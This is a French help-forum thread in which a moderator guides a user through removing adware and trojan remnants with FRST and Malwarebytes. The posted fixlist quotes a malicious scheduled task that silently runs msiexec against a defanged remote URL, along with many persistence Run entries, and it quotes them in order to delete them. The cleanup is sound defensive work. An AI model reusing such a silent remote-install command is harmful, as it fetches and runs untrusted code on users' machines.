Page qui s'ouvre toute seul après un virus
Shirozuke
-
Malekal_morte- Messages postés 180304 Date d'inscription Statut Modérateur, Contributeur sécurité Dernière intervention -
Malekal_morte- Messages postés 180304 Date d'inscription Statut Modérateur, Contributeur sécurité Dernière intervention -
Bonjour, il y a deux jours en téléchargeant un logiciel, j'ai malencontreusement "attrapé" un virus sur mon ordinateur de type "cheval de troie". Grace aux logiciel déjà présent sur mon pc, j'ai pu arrêter le propagation du virus. Cependant j'ai toujours des pages qui s'ouvre toute seuls au bout d'un certain temps d'activité sur mon pc.
J'ai déjà installer Malwabytes ainsi que AdwCleaner qui ont analysé et réparer certaines choses mais le pc est toujours affecté.
Si quelqu'un peut m'aider ce serait fort sympathique.
Merci d'avance
J'ai déjà installer Malwabytes ainsi que AdwCleaner qui ont analysé et réparer certaines choses mais le pc est toujours affecté.
Si quelqu'un peut m'aider ce serait fort sympathique.
Merci d'avance
A voir également:
- Page qui s'ouvre toute seul après un virus
- Supprimer page word - Guide
- Comment imprimer un tableau excel sur une seule page - Guide
- Comment ouvrir un fichier epub ? - Guide
- Comment ouvrir un fichier bin ? - Guide
- Virus mcafee - Accueil - Piratage
4 réponses
Salut,
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).
Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).
Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
- FRST.txt
- Shortcut.txt
- Additionnal.txt
Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.
j'ai déjà un problème, mon pc ne veux pas ouvrir FRST, tout mes autres programmes fonctionne mais lorsque je veux lancé celui-ci il ne veut pas.
Voici les 3 rapports demandé ( dans l'ordre: FRST, Addition, Shortcut)
http://pjjoint.malekal.com/files.php?id=FRST_20170528_6m6q14h7y9
http://pjjoint.malekal.com/files.php?id=20170528_l12z10d11o13c9
http://pjjoint.malekal.com/files.php?id=20170528_q11y14k7r6p8
http://pjjoint.malekal.com/files.php?id=FRST_20170528_6m6q14h7y9
http://pjjoint.malekal.com/files.php?id=20170528_l12z10d11o13c9
http://pjjoint.malekal.com/files.php?id=20170528_q11y14k7r6p8
Peut-être désinstallé tout ça pour ce que ça sert :
Avast SecureLine for Asustek
Akamai NetSession Interface
Apowersoft Online Launcher
Ashampoo Music Studio 6
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
3°)
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
4°)
Vois ce que cela donne et si des améliorations ont eu lieu.
Si ce n'est pas le cas, s itu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.
Refais un scan FRST et donne les nouveaux rapports via pjjoint.
Veuillez appuyer sur une touche pour continuer la désinfection...
Avast SecureLine for Asustek
Akamai NetSession Interface
Apowersoft Online Launcher
Ashampoo Music Studio 6
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
CreateRestorePoint:
CloseProcesses:
Task: {0B3F9CD2-C8E5-45DA-9E68-3C6926D6A69E} - System32\Tasks\Shimuied Update => C:\Program Files (x86)\Shiqighchefech\yaupdcache.exe [2017-05-26] ()
Task: {16E70CAC-133E-45CC-B2C4-4E667B2FA9F0} - \{0D0D0547-0F0E-780A-0A11-04080D04110A} -> Pas de fichier <==== ATTENTION
Task: {F63F9AC1-82C2-44B1-AFAE-58D7F7B6748F} - System32\Tasks\Microsoft\Windows\DeviceSettings\Ckqerdomgrerlergh => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=TOSHIBAXMQ01ABD100_46F1PUO0TXX46F1PUO0T&d=20170526 /q <==== ATTENTION
HKU\S-1-5-21-295381115-1451404680-1884827357-1001\...\Run: [hae5tlinv0g] => C:\Users\natsu\AppData\Roaming\l4ixhkmpczz\ol1m3ha2yj2.exe
HKU\S-1-5-21-295381115-1451404680-1884827357-1001\...\Run: [kaco532wpzx] => C:\Users\natsu\AppData\Roaming\gprcezuuqhv\mu4ntjhupyw.exe
HKU\S-1-5-21-295381115-1451404680-1884827357-1001\...\Run: [AG8P1GYNLQYR1QR] => C:\Program Files (x86)\fwcyghc45yt\VLFEV.exe [1210880 2017-05-26] (47K)
HKU\S-1-5-21-295381115-1451404680-1884827357-1001\...\Run: [2grnetdeqnd] => C:\Users\natsu\AppData\Roaming\uksyqnrcbwk\41ad1m002lg.exe
HKU\S-1-5-21-295381115-1451404680-1884827357-1001\...\Run: [rygp2uyleo4] => C:\Users\natsu\AppData\Roaming\3j0hzeqsie0\cmxb00goood.exe
HKU\S-1-5-21-295381115-1451404680-1884827357-1001\...\Run: [lni3sd4y5yi] => C:\Users\natsu\AppData\Roaming\likjzsl34gw\ilget0fhwj0.exe
HKU\S-1-5-21-295381115-1451404680-1884827357-1001\...\Run: [gmgu14c2kbn] => C:\Users\natsu\AppData\Roaming\ajjkk4npwuw\g1lxdetluav.exe
HKU\S-1-5-21-295381115-1451404680-1884827357-1001\...\Run: [31ss0isakb0] => C:\Users\natsu\AppData\Roaming\zb1jskm0otc\dx3lpchqlwi.exe
HKU\S-1-5-21-295381115-1451404680-1884827357-1001\...\Run: [5jzow0fa5br] => C:\Users\natsu\AppData\Roaming\voxjdi30m1k\3bv5wqqk0vg.exe
HKU\S-1-5-21-295381115-1451404680-1884827357-1001\...\Run: [ukqnll2kp2t] => C:\Users\natsu\AppData\Roaming\ldkx2jafz0e\1vnljtiols1.exe
2017-05-26 15:04 - 2017-05-26 15:07 - 63364552 _____ (Malwarebytes ) C:\Users\natsu\Downloads\mb3-setup-consumer-3.1.2.1733-1.0.122-1.0.1976.exe
2017-05-26 15:01 - 2017-05-26 15:01 - 00000000 ___HD C:\Users\natsu\AppData\Roaming\GiftBox
2017-05-26 14:56 - 2017-05-26 15:14 - 00000000 ____D C:\Users\natsu\AppData\Roaming\ldkx2jafz0e
2017-05-26 14:56 - 2017-05-26 15:10 - 00000000 ____D C:\Users\natsu\AppData\Roaming\Clafathersmsy
2017-05-26 14:56 - 2017-05-26 14:59 - 00000000 ____D C:\Users\natsu\AppData\Local\Ferdercult
2017-05-26 14:56 - 2017-05-26 14:56 - 00006116 _____ C:\WINDOWS\System32\Tasks\Shimuied Update
2017-05-26 14:56 - 2017-05-26 14:56 - 00000000 ____D C:\Program Files (x86)\Shiqighchefech
2017-05-26 14:55 - 2017-05-26 15:14 - 00000000 ____D C:\Users\natsu\AppData\Roaming\voxjdi30m1k
2017-05-26 14:42 - 2017-05-26 14:42 - 00000000 ____D C:\Program Files\6d06092b4b949b3096b281f0e59e8840
2017-05-26 14:41 - 2017-05-26 14:43 - 00000000 ____D C:\Users\natsu\AppData\Local\FBTime
2017-05-26 14:39 - 2017-05-26 15:14 - 00000000 ____D C:\Users\natsu\AppData\Roaming\zb1jskm0otc
2017-05-26 14:39 - 2017-05-26 14:39 - 00000000 ____D C:\WINDOWS\system32\sstmp
2017-05-26 14:38 - 2017-05-26 15:13 - 00000000 ____D C:\Users\natsu\AppData\Roaming\ajjkk4npwuw
2017-05-26 14:37 - 2017-05-26 15:13 - 00000000 ____D C:\Users\natsu\AppData\Roaming\likjzsl34gw
2017-05-26 14:33 - 2017-05-26 15:13 - 00000000 ____D C:\Users\natsu\AppData\Roaming\3j0hzeqsie0
2017-05-26 14:33 - 2017-05-26 14:33 - 00140800 _____ C:\Users\natsu\AppData\Local\installer.dat
2017-05-26 14:33 - 2017-05-26 14:33 - 00016828 _____ C:\WINDOWS\System32\Tasks\Amigo Swap Maker
2017-05-26 14:33 - 2017-05-26 14:33 - 00011568 _____ C:\Users\natsu\AppData\Local\InstallationConfiguration.xml
2017-05-26 14:33 - 2017-05-26 14:33 - 00000000 ____D C:\Users\natsu\AppData\Local\CrashRpt
2017-05-26 14:33 - 2017-05-26 14:33 - 00000000 ____D C:\Program Files\G78LEIMI40
2017-05-26 14:33 - 2017-05-26 14:33 - 00000000 ____D C:\Program Files\G1W6UCV2O1
2017-05-26 14:32 - 2017-05-26 15:13 - 00000000 ____D C:\Users\natsu\AppData\Roaming\uksyqnrcbwk
2017-05-26 14:31 - 2017-05-26 15:13 - 00000000 ____D C:\Users\natsu\AppData\Roaming\gprcezuuqhv
2017-05-26 14:31 - 2017-05-26 14:45 - 00000000 ____D C:\Program Files (x86)\fwcyghc45yt
2017-05-26 14:31 - 2017-05-26 14:31 - 00000021 _____ C:\ServiceLog.txt
2017-05-26 14:30 - 2017-05-26 15:13 - 00000000 ____D C:\Users\natsu\AppData\Roaming\l4ixhkmpczz
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
- Réparer Mozilla Firefox (premier paragraphe)
- Réparer Google Chrome (seulement le premier paragraphe).
- Réinitialiser et réparer Internet Explorer
3°)
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
4°)
Vois ce que cela donne et si des améliorations ont eu lieu.
Si ce n'est pas le cas, s itu as encore des pages de pubs intempestives, précise sur quel navigateur WEB.
Refais un scan FRST et donne les nouveaux rapports via pjjoint.
Veuillez appuyer sur une touche pour continuer la désinfection...